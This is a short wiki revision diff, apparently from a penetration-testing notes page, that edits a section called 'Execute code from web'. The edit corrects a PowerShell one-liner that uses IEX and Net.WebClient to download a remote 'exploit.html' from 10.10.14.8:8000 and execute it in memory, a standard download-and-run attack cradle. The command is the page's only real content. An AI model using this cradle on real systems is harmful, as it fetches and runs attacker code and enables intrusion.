Changes

Jump to navigation Jump to search
7 bytes added ,  11:40, 16 January 2020
m
Line 1: Line 1:  
==Execute code from web==
 
==Execute code from web==
 
<syntaxhighlight lang="powershell">
 
<syntaxhighlight lang="powershell">
powershell "IEX(New-Object Net.WebClient).downloadString('10.10.14.8:8000/exploit.html')"
+
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.8:8000/exploit.html')"
 
</syntaxhighlight>
 
</syntaxhighlight>
  

Navigation menu